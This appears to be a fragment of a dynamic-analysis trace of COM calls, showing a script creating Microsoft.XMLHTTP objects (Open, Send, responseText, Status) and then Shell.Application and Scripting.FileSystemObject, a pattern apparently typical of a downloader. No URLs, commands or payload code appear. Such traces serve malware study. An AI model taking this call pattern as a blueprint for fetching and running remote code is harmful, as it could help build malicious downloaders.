	[0666.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0666.469] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0666.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0666.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0666.470] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0666.470] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0668.097] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0668.097] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0668.097] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0668.097] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0668.098] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0668.098] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0668.098] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0668.098] SysStringLen (param_1=0x0) returned 0x0
	[0668.098] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0668.098] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0668.098] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0668.098] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0668.098] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0668.098] ??2@YAPEAX_K@Z () returned 0x62f350
	[0668.099] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0668.099] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0668.099] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0668.099] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0668.099] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0668.099] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0668.099] SysStringLen (param_1=0x0) returned 0x0
	[0668.099] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0668.102] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0668.102] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0668.102] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0668.102] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0668.102] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0668.102] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0670.613] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0670.613] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0670.613] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0670.615] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0670.615] SysStringLen (param_1=0x0) returned 0x0
	[0670.615] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0670.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0670.615] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0670.615] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0670.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0670.615] ??2@YAPEAX_K@Z () returned 0x62f330
	[0670.616] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0670.616] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0670.616] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0670.616] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0670.616] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0670.616] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0670.616] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0670.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0670.619] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0670.619] SysStringLen (param_1=0x0) returned 0x0
	[0670.619] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0670.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0670.619] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74c0) returned 0x0
	[0670.619] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0670.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0670.620] ??2@YAPEAX_K@Z () returned 0x62f310
	[0670.620] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f310) 
	[0670.620] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0670.620] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0670.620] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74c0) returned 0x0
	[0670.620] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74c0) returned 0x3
	[0670.620] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0670.620] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0670.620] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0670.620] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0670.620] SysStringLen (param_1=0x0) returned 0x0
	[0670.620] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0670.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0670.621] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0670.621] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0670.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0670.621] ??2@YAPEAX_K@Z () returned 0x62f330
	[0670.621] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0670.621] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0670.621] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0670.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0670.621] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0670.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0670.621] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0670.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0670.622] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0670.622] SysStringLen (param_1=0x0) returned 0x0
	[0670.622] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0670.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0670.622] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0670.622] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0670.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b98) returned 0x0
	[0670.622] ??2@YAPEAX_K@Z () returned 0x62f310
	[0670.622] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b98, pUnkSite=0x62f310) 
	[0670.622] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0670.622] XMLHTTPRequest:IUnknown:Release (This=0x49c5b98) returned 0x0
	[0670.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0670.623] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
